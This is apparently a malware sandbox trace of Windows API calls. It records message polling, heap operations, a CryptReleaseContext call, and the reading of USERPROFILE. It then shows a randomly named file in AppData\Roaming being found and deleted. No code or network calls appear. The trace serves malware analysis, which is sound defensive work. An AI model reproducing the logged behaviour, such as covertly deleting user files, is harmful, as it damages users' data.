wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.169] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.169] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.169] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.169] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.169] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.169] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.169] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.169] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.170] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.170] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.170] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.170] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.170] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.171] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.171] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.171] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.171] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.171] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.171] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.171] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.171] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.171] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.171] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.171] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0151.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0151.171] CryptReleaseContext (hProv=0x9bed58, dwFlags=0x0) returned 1 [0151.171] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.171] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.172] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.172] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.172] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.172] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.172] FreeLibrary (hLibModule=0x76390000) returned 1 [0151.172] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.172] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.172] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.172] CloseHandle (hObject=0x4f0) returned 1 [0151.173] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.173] CloseHandle (hObject=0x4b0) returned 1 [0151.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.177] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.177] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.177] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0151.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0151.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0151.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0151.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0151.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0151.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a68440 [0151.178] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/SROlf 2S5m.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\SROlf 2S5m.m4a", lpFilePart=0x8cedf4*="SROlf 2S5m.m4a") returned 0x2e [0151.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0151.178] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SROlf 2S5m.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\srolf 2s5m.m4a")) returned 0x20 [0151.178] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SROlf 2S5m.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4894b540, ftCreationTime.dwHighDateTime=0x1d5cdce, ftLastAccessTime.dwLowDateTime=0x98776f80, ftLastAccessTime.dwHighDateTime=0x1d5c8ce, ftLastWriteTime.dwLowDateTime=0x98776f80, ftLastWriteTime.dwHighDateTime=0x1d5c8ce, nFileSizeHigh=0x0, nFileSizeLow=0x169ce, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="SROlf 2S5m.m4a", cAlternateFileName="SROLF2~1.M4A")) returned 0x9e2078 [0151.178] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SROlf 2S5m.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\srolf 2s5m.m4a")) returned 1 [0151.182] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4894b540, ftCreationTime.dwHighDateTime=0x1d5cdce, ftLastAccessTime.dwLowDateTime=0x98776f80, ftLastAccessTime.dwHighDateTime=0x1d5c8ce, ftLastWriteTime.dwLowDateTime=0x98776f80, ftLastWriteTime.dwHighDateTime=0x1d5c8ce, nFileSizeHigh=0x0, nFileSizeLow=0x169ce, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="SROlf 2S5m.m4a", cAlternateFileName="SROLF2~1.M4A")) returned 0 [0151.182] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0151.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0151.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.182] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0151.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0151.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0151.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0151.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0151.183] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0151.183] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0151.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0151.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a68440 [0151.184] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/SROlf 2S5m.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\SROlf 2S5m.m4a", lpFilePart=0x8cf650*="SROlf 2S5m.m4a") returned 0x2e [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0151.184] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\SROlf 2S5m.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\srolf 2s5m.m4a")) returned 0xffffffff [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.185] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0151.185] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.185] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0151.186] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0151.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0151.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0151.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0151.187] 